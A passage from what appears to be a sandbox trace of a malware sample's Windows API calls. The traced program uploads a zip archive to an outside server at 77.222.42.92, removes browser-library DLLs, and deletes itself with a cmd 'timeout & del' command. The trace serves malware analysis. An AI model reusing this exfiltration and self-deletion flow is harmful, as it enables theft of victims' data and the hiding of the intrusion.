_Str2=0x416c50) returned -1 [0210.924] _mbsicmp (_Str1=0x19d466, _Str2=0x416c58) returned -1 [0210.924] _mbsicmp (_Str1=0x19d466, _Str2=0x416c60) returned 1 [0210.924] _mbsicmp (_Str1=0x19d466, _Str2=0x416c68) returned -1 [0210.924] _mbsicmp (_Str1=0x19d466, _Str2=0x416c70) returned 1 [0210.925] _mbsicmp (_Str1=0x19d466, _Str2=0x416c78) returned 1 [0210.925] _mbsicmp (_Str1=0x19d466, _Str2=0x416c7c) returned -1 [0210.925] GetLocalTime (in: lpSystemTime=0x19d024 | out: lpSystemTime=0x19d024*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x1, wDay=0xd, wHour=0x10, wMinute=0x7, wSecond=0x0, wMilliseconds=0x308)) [0210.925] SystemTimeToFileTime (in: lpSystemTime=0x19d024, lpFileTime=0x19d03c | out: lpFileTime=0x19d03c) returned 1 [0210.925] FileTimeToSystemTime (in: lpFileTime=0x19d010, lpSystemTime=0x19cff8 | out: lpSystemTime=0x19cff8) returned 1 [0210.926] GetTickCount () returned 0x20882bb [0210.926] GetDesktopWindow () returned 0x10010 [0210.926] srand (_Seed=0x20982ab) [0210.926] rand () returned 2240 [0210.926] rand () returned 4326 [0210.926] rand () returned 27394 [0210.926] rand () returned 28337 [0210.926] rand () returned 12425 [0210.926] rand () returned 15239 [0210.926] rand () returned 17265 [0210.926] rand () returned 8630 [0210.926] rand () returned 4814 [0210.926] rand () returned 4607 [0210.926] rand () returned 31345 [0210.926] rand () returned 14010 [0210.939] GetProcessHeap () returned 0x5b0000 [0210.939] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x6333e8 [0210.939] GetProcessHeap () returned 0x5b0000 [0210.939] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x360) returned 0x633bd8 [0210.939] SelectObject (hdc=0x480106ef, h=0x185000f) returned 0x3c0506c3 [0210.939] GdipDisposeImage (image=0x9161f08) returned 0x0 [0211.019] GdiplusShutdown (token=0x20864d3) [0211.027] DeleteObject (ho=0x3c0506c3) returned 1 [0211.027] DeleteObject (ho=0x480106ef) returned 1 [0211.027] ReleaseDC (hWnd=0x10010, hDC=0xa0100d0) returned 1 [0211.046] CloseWindow (hWnd=0x10010) returned 1 [0211.046] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0211.046] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x19ce60, dwBufferLength=0x4) returned 1 [0211.053] InternetConnectA (hInternet=0xcc0004, lpszServerName="77.222.42.92", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0211.053] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/goodnews.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x0) returned 0xcc000c [0211.053] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0211.174] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19c688, dwNumberOfBytesToRead=0x7cf, lpdwNumberOfBytesRead=0x19c680 | out: lpBuffer=0x19c688*, lpdwNumberOfBytesRead=0x19c680*=0x0) returned 1 [0211.175] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0211.175] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0211.175] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0211.175] CryptStringToBinaryA (in: pszString="", cchString=0x0, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19c670, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19c670, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0211.175] CryptStringToBinaryA (in: pszString="", cchString=0x0, dwFlags=0x1, pbBinary=0x19784c, pcbBinary=0x19c670, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19784c, pcbBinary=0x19c670, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0211.175] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0211.175] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0211.175] strtok (in: _Str="", _Delim="|" | out: _Str="") returned 0x0 [0211.179] GetProcessHeap () returned 0x5b0000 [0211.179] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x800000) returned 0x9df8020 [0211.205] InternetOpenA (lpszAgent=0x0, dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0211.205] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x19d62c, dwBufferLength=0x4) returned 1 [0211.205] GetSystemTime (in: lpSystemTime=0x19b380 | out: lpSystemTime=0x19b380*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x1, wDay=0xd, wHour=0xe, wMinute=0x7, wSecond=0x1, wMilliseconds=0x38)) [0211.205] lstrcatA (in: lpString1="", lpString2="EC2N7YCBIEUAAA1N" | out: lpString1="EC2N7YCBIEUAAA1N") returned="EC2N7YCBIEUAAA1N" [0211.205] lstrcatA (in: lpString1="", lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0211.205] lstrcatA (in: lpString1="\r\n", lpString2="------" | out: lpString1="\r\n------") returned="\r\n------" [0211.205] lstrcatA (in: lpString1="\r\n------", lpString2="EC2N7YCBIEUAAA1N" | out: lpString1="\r\n------EC2N7YCBIEUAAA1N") returned="\r\n------EC2N7YCBIEUAAA1N" [0211.205] lstrcatA (in: lpString1="\r\n------EC2N7YCBIEUAAA1N", lpString2="--" | out: lpString1="\r\n------EC2N7YCBIEUAAA1N--") returned="\r\n------EC2N7YCBIEUAAA1N--" [0211.205] lstrcatA (in: lpString1="\r\n------EC2N7YCBIEUAAA1N--", lpString2="\r\n" | out: lpString1="\r\n------EC2N7YCBIEUAAA1N--\r\n") returned="\r\n------EC2N7YCBIEUAAA1N--\r\n" [0211.205] lstrcatA (in: lpString1="", lpString2="Content-Type: multipart/form-data; boundary=----" | out: lpString1="Content-Type: multipart/form-data; boundary=----") returned="Content-Type: multipart/form-data; boundary=----" [0211.205] lstrcatA (in: lpString1="Content-Type: multipart/form-data; boundary=----", lpString2="EC2N7YCBIEUAAA1N" | out: lpString1="Content-Type: multipart/form-data; boundary=----EC2N7YCBIEUAAA1N") returned="Content-Type: multipart/form-data; boundary=----EC2N7YCBIEUAAA1N" [0211.205] InternetConnectA (hInternet=0xcc0004, lpszServerName="77.222.42.92", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0211.206] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/goodnews.php", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x0) returned 0xcc000c [0211.206] lstrcatA (in: lpString1="", lpString2="------" | out: lpString1="------") returned="------" [0211.206] lstrcatA (in: lpString1="------", lpString2="EC2N7YCBIEUAAA1N" | out: lpString1="------EC2N7YCBIEUAAA1N") returned="------EC2N7YCBIEUAAA1N" [0211.206] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N", lpString2="\r\n" | out: lpString1="------EC2N7YCBIEUAAA1N\r\n") returned="------EC2N7YCBIEUAAA1N\r\n" [0211.206] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\n", lpString2="Content-Disposition: form-data; name=\"" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"" [0211.206] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"", lpString2="file" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file" [0211.206] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file", lpString2="\"\r\n\r\n" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n" [0211.206] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n", lpString2="0R1N7QQI.zip" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip" [0211.206] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip", lpString2="\r\n" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n" [0211.206] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n", lpString2="------" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------" [0211.206] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------", lpString2="EC2N7YCBIEUAAA1N" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N" [0211.206] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N", lpString2="\r\n" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\n") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\n" [0211.206] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\n", lpString2="Content-Disposition: form-data; name=\"file\"; filename=\"" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"" [0211.207] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"", lpString2="0R1N7QQI.zip" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip" [0211.207] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip", lpString2="\"\r\n" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\n") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\n" [0211.207] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\n", lpString2="Content-Type: application/octet-stream" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream" [0211.207] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream", lpString2="\r\n" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream\r\n") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream\r\n" [0211.207] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream\r\n", lpString2="Content-Transfer-Encoding: binary" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary" [0211.207] lstrcatA (in: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary", lpString2="\r\n\r\n" | out: lpString1="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n" [0211.208] lstrlenA (lpString="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned 256 [0211.208] lstrlenA (lpString="\r\n------EC2N7YCBIEUAAA1N--\r\n") returned 28 [0211.208] GetProcessHeap () returned 0x5b0000 [0211.208] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1b595) returned 0x9d0c3f0 [0211.210] lstrlenA (lpString="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned 256 [0211.210] lstrlenA (lpString="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned 256 [0211.211] lstrlenA (lpString="\r\n------EC2N7YCBIEUAAA1N--\r\n") returned 28 [0211.211] lstrlenA (lpString="------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n0R1N7QQI.zip\r\n------EC2N7YCBIEUAAA1N\r\nContent-Disposition: form-data; name=\"file\"; filename=\"0R1N7QQI.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned 256 [0211.211] lstrlenA (lpString="Content-Type: multipart/form-data; boundary=----EC2N7YCBIEUAAA1N") returned 64 [0211.262] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=----EC2N7YCBIEUAAA1N", dwHeadersLength=0x40, lpOptional=0x9d0c3f0*, dwOptionalLength=0x1b595) returned 1 [0211.824] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19b4b0, dwNumberOfBytesToRead=0x7cf, lpdwNumberOfBytesRead=0x19b4a8 | out: lpBuffer=0x19b4b0*, lpdwNumberOfBytesRead=0x19b4a8*=0x0) returned 1 [0211.824] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0211.824] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0211.824] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0211.825] CryptStringToBinaryA (in: pszString="", cchString=0x0, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19b494, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19b494, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0211.825] CryptStringToBinaryA (in: pszString="", cchString=0x0, dwFlags=0x1, pbBinary=0x196670, pcbBinary=0x19b494, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x196670, pcbBinary=0x19b494, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0211.825] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0211.825] lstrlenA (lpString="") returned 0 [0211.825] DeleteFileA (lpFileName="C:\\ProgramData\\sqlite3.dll" (normalized: "c:\\programdata\\sqlite3.dll")) returned 1 [0211.833] DeleteFileA (lpFileName="C:\\ProgramData\\freebl3.dll" (normalized: "c:\\programdata\\freebl3.dll")) returned 0 [0211.834] DeleteFileA (lpFileName="C:\\ProgramData\\mozglue.dll" (normalized: "c:\\programdata\\mozglue.dll")) returned 0 [0211.834] DeleteFileA (lpFileName="C:\\ProgramData\\msvcp140.dll" (normalized: "c:\\programdata\\msvcp140.dll")) returned 0 [0211.834] DeleteFileA (lpFileName="C:\\ProgramData\\nss3.dll" (normalized: "c:\\programdata\\nss3.dll")) returned 0 [0211.834] DeleteFileA (lpFileName="C:\\ProgramData\\softokn3.dll" (normalized: "c:\\programdata\\softokn3.dll")) returned 0 [0211.834] DeleteFileA (lpFileName="C:\\ProgramData\\vcruntime140.dll" (normalized: "c:\\programdata\\vcruntime140.dll")) returned 0 [0211.834] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19d4fc, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0x62 [0211.835] wsprintfA (in: param_1=0x19d3f4, param_2="/c timeout /t 5 & del /f /q \"%s\" & exit" | out: param_1="/c timeout /t 5 & del /f /q \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\" & exit") returned 135 [0212.021] ShellExecuteExA (in: pExecInfo=0x19d608*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\\\Windows\\\\System32\\\\cmd.exe", lpParameters="/c timeout /t 5 & del /f /q \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\" & exit", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x19d608*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\\\Windows\\\\System32\\\\cmd.exe", lpParameters="/c timeout /t 5 & del /f /q \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\" & exit", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0224.495] ExitProcess (uExitCode=0x0) Thread: id = 8 os_tid = 0x2f4 Thread: id = 9 os_tid = 0x674 Thread: id = 10 os_tid = 0x708 Thread: id = 11 os_tid = 0x600 Thread: id = 12 os_tid = 0xec Thread: id = 20 os_tid = 0x490 Thread: id = 21 os_tid = 0x13b4 Thread: id = 22 os_tid = 0x5c4 Thread: id = 23 os_tid = 0xe90 Thread: id = 24 os_tid = 0x690 Thread: id = 25 os_tid = 0x890 Process: id = "3" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x23580000" os_pid = "0xb80" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x268" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f024" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 665 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 666 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 667 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 668 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 669 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 670 start_va = 0x160000 end_va = 0x161fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 671 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 672 start_va = 0x180000 end_va = 0x186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 673 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 674 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 675 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 676 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 677 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 678 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 679 start_va = 0x1f0000 end_va = 0x1f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 680 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 681 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 682 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 683 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 684 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 685 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 686 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 687 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = 